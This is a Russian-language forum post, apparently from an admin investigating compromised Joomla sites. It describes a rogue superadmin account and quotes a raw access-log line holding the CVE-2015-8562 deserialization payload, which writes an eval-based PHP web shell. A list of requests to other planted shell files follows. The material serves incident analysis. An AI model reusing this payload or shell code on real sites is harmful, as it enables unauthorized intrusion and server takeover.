вот тут hxxp://rniiap.ru/forum/profile/1769-joomla-user-helper-cisev.html - последняя версия между прочем - является супердмином, созданным в результате запроса к базе данных.

при создании было обращение к файлу на серваке. В логах это пишется, к какому файлу было обращение.

этот юзер нигде никогда не заходил

ниже - сайт другой, версия другая, но юзер - аналогичный

между прочим вот твой редкий случай - вот он заливает шелл НО ЭТО БЫЛ НЕ ОН ! это CVE-2015-8562 и не работает на этом серваке...

========================

"GET / HTTP/1.1" 200 43723 "-" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"f c\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\ 0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"Simp lePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriver Mysql\":0:{}s:8:\"feed_url\";s:237:\"file_put_cont ents($_SERVER[\"DOCUMENT_ROOT\"].chr(47).\"admim.php\",\"|=|\\x3C\".chr(63).\"php \\x24mujj=\\x24_POST['gtr'];if(\\x24mujj!=''){\\x24xsser=base64_decode(\\x24_ POST['z0']);@eval(\\\"\\\\\\x24safedg=\\x24xsser;\\\");}\"); JFactory::getConfig();exit;\";s:19:\"cache_name_fu nction\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"c ache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i: 1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1; }~\xd9"

=====================

отстальные запросы были:

"GET /administrator/components/com_installer/akdjxnk/rxttekb.php 6B

"GET /components/com_rokquickcart/assets/gallery45.php

"GET /images/stories/postelnie/TWINS/dir.php

"GET /includes/js/jscalendar-1.0/session.php

"GET /media/shop/admin_files/html/admin.function_form.php

"GET /modules/mod_newsflash/helper.php

"GET /modules/mod_virtuemart/vm_transmenu/img/javascript.php

"POST /administrator/components/com_categories/toolbar.categories.html.php

"POST /administrator/components/com_config/toolbar.config.html.php

"POST /administrator/components/com_installer/akdjxnk/rxttekb.php

"POST /components/com_poll/assets/plugin27.php

"POST /components/com_rokquickcart/assets/gallery45.php